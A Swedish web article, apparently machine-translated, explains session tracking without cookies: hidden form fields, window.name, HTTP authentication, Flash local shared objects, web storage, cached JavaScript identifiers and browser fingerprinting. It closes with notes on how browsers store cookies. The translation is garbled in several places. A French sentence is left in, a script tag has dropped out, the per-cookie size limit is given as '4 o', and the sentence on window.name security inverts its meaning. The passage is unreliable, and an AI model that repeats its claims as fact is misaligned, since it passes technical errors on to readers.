En form av sessionsspårning, som används av ASP.NET, är att använda webbformulär med dolda fält. Denna teknik är mycket lik att använda URL-frågesträngar för att överföra information och har samma fördelar och nackdelar; och om formuläret bearbetas med HTTP GET-metoden blir fälten faktiskt en del av webbadressen till webbläsaren som skickar den när formuläret skickas. Men de flesta formulär behandlas med HTTP POST, vilket gör att formulärinformationen, inklusive dolda fält, läggs till som en extra indata som varken är en del av URL:en eller en cookie.

Det här tillvägagångssättet har två fördelar ur ett spårningsperspektiv: för det första, spårning av informationen som placeras i HTML-källkoden och POST-inmatning snarare än URL-adressen gör att den genomsnittliga användaren kan undvika denna spårning; för det andra kopieras inte sessionsinformationen när användaren kopierar URL:en (för att till exempel spara sidan på disk eller skicka den via e-post).

fönster.namn

Alla vanliga webbläsare kan lagra ganska stora mängder data (2MB till 32MB) via JavaScript med hjälp av DOM:s window.name-egenskap. Denna data kan användas istället för sessionscookies och används även över domäner. Tekniken kan kopplas till JSON-objekt för att lagra en komplex uppsättning sessionsvariabler på klientsidan.

Nackdelen är att varje separat fönster eller flik initialt kommer att ha ett tomt window.name; när du bläddrar efter flikar (öppnas av användaren) betyder det att flikarna som öppnas individuellt inte kommer att ha ett fönsternamn. Dessutom kan window.name användas för att spåra besökare på olika webbplatser som kan utgöra ett integritetsproblem.

I vissa avseenden kan detta vara säkrare än cookies, på grund av att servern inte är involverad, vilket gör den osårbar för nätverksattacker av sniffer-cookies. Om speciella åtgärder vidtas för att skydda uppgifterna är det dock sårbart för ytterligare attacker, eftersom uppgifterna är tillgängliga via andra sajter som öppnas i samma fönster.

HTTP-autentisering

HTTP-protokollet inkluderar de grundläggande åtkomstautentiseringsprotokollen och åtkomstautentiseringssammandraget, som tillåter åtkomst till en webbsida endast när användaren har angett användarnamn och lösenord. Om servern begär ett certifikat för att ge åtkomst till en webbsida, begär webbläsaren det från användaren och när den har fått det lagrar webbläsaren det och skickar det i alla efterföljande HTTP-förfrågningar. Denna information kan användas för att spåra användaren.

Lokalt delat objekt

Om en webbläsare innehåller plugin-programmet Adobe Flash Player, lokala delade objekt kan användas för samma ändamål som cookies. De kan vara ett attraktivt val för webbutvecklare eftersom:

standardstorleksgränsen för ett lokalt delat objekt är 100 KB;
säkerhetskontroller är separata från kontroller av användarcookies (så lokala delade objekt kan tillåtas när cookies inte är det).

Denna sista punkt, som skiljer policyn för cookiehantering från den för Adobes lokala delade objekt väcker frågor angående användarens hantering av sina sekretessinställningar: han måste vara medveten om att hans hantering av cookies inte har någon inverkan på hanteringen av lokala delade objekt, och vice versa.

En annan kritik mot detta system är att det endast kan användas via Adobe Flash Player-plugin som är proprietär och inte en webbstandard.

Uthållighet på klientsidan

Vissa webbläsare stöder en skriptbaserad beständighetsmekanism, som gör att sidan kan lagra information lokalt för senare användning. Internet Explorer, till exempel, stöder beständig information i webbläsarhistorik, bokmärken, i ett format som lagras i XML eller direkt med en webbsida sparad på disk. För Microsoft Internet Explorer 5 finns en användardatametod tillgänglig via DHTML-beteenden.

W3C introducerade i HTML 5 ett nytt JavaScript API för datalagring på klientsidan som kallas webblagring och syftade till att permanent ersätta cookies. Det liknar cookies men med kraftigt förbättrad kapacitet och utan att lagra information i headern för HTTP-förfrågningar. API:et tillåter två typer av webblagring: lokal lagring och sessionslagring, liknande beständiga cookies och sessionscookies (förutom att sessionscookies upphör när webbläsaren stängs medan sessionslagring löper ut när fliken stängs). Webblagring stöds av Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 och Opera 10.50.

En annan mekanism förlitar sig normalt på webbläsarcache (i minne snarare än uppdatering) med JavaScript-program på webbsidor.

Till exempel kan en sida innehålla taggen . La première fois que la page se charge, le programme exemple.js est aussi chargé.

Vid denna tidpunkt finns programmet kvar i cacheminnet och den besökta sidan laddas inte om en andra gång. Följaktligen, om programmet innehåller en global variabel (till exempel var id = 3243242;), förblir denna identifierare giltig och kan utnyttjas av annan JavaScript-kod när sidan laddas igen, eller när en sida som länkar programmet har laddats.

Den stora nackdelen med denna metod är att JavaScripts globala variabel måste vara statisk, vilket innebär att den inte kan ändras eller raderas som en cookie.

webbläsarens fingeravtryck

Ett webbläsarfingeravtryck är information som samlas in om konfigurationsinställningarna för en webbläsare i identifieringssyfte. Dessa fingeravtryck kan användas för att helt eller delvis identifiera en Internetanvändare eller en enhet även när cookies är inaktiverade.

Grundläggande webbläsarkonfigurationsinformation har länge samlats in av webbpubliktjänster i syfte att exakt mäta mänsklig webbtrafik och upptäcka olika former av klickbedrägeri. Med hjälp av skriptspråk på klientsidan blir informationsinsamlingen mycket mer exakt nu möjligt.

Att konvertera denna information till en bitsträng ger ett fingeravtryck på enheten. 2010 mätte Electronic Frontier Foundation (EFF) entropin i en webbläsares fingeravtryck till att vara minst 18,1 bitar, och det var innan framstegen inom canvas fingeravtryck lade 5,7 bitar till den entropin.

Kakor i ett nötskal

Cookies är små textfiler som lagras av webbläsaren på en webbplatsbesökares hårddisk och som används (bland annat) för att registrera information om besökaren eller dennes resa genom webbplatsen. Webbmastern kan alltså känna igen en besökares vanor och anpassa presentationen av sin webbplats för varje besökare; cookies gör det sedan möjligt att komma ihåg hur många artiklar som ska visas på hemsidan eller till och med behålla inloggningsuppgifterna för en privat part: när besökaren återvänder till webbplatsen är det inte längre nödvändigt för honom att skriva in sitt namn och lösenord för att kännas igen, eftersom de automatiskt läses i cookien.

En cookie har en begränsad livslängd, inställd av webbplatsdesignern. De kan också upphöra att gälla i slutet av sessionen på webbplatsen, vilket motsvarar att webbläsaren stängs. Cookies används i stor utsträckning för att göra livet enklare för besökare och ge dem mer relevant information. Men speciella tekniker gör det möjligt att följa en besökare på flera sajter och på så sätt samla in och korskontrollera mycket omfattande information om dennes vanor. Denna metod har gett användningen av cookies ett rykte som en övervakningsteknik som kränker besökarnas integritet, vilket tyvärr överensstämmer med verkligheten i många fall av användning av icke-tekniska skäl eller som inte respekterar användarnas förväntningar. .

Som svar på dessa berättigade farhågor introducerar HTML 5 ett nytt JavaScript API för datalagring på klientsidan som kallas webblagring, som är mycket säkrare och med större kapacitet, som syftar till att ersätta cookies.

Lagring av cookies

Med vissa webbläsare är en cookie lätt redigerbar, en enkel textredigerare som Anteckningar räcker för att ändra dess värden manuellt.

Cookies sparas på olika sätt beroende på webbläsare:

Microsoft Internet Explorer sparar varje cookie i en annan fil;
Mozilla Firefox sparar alla sina cookies i en enda fil;
Opera sparar alla sina cookies i en enda fil och krypterar dem (omöjligt att ändra dem förutom i programvarualternativen);
Apple Safari sparar alla sina cookies i en enda .plist-tilläggsfil. Ändring är möjlig men inte särskilt lätt, om du inte går igenom mjukvarualternativen.

Webbläsare krävs för att stödja åtminstone :

300 samtidiga kakor;
4 o per kaka;
20 cookies per värd eller domän.

[Total: 0 Betyda: 0]

Internetkaka: Vad är det? Definition, ursprung, typer och integritet

Vilken roll har en kaka, vad är den och vilka typer av kakor finns det? 🍪

Historique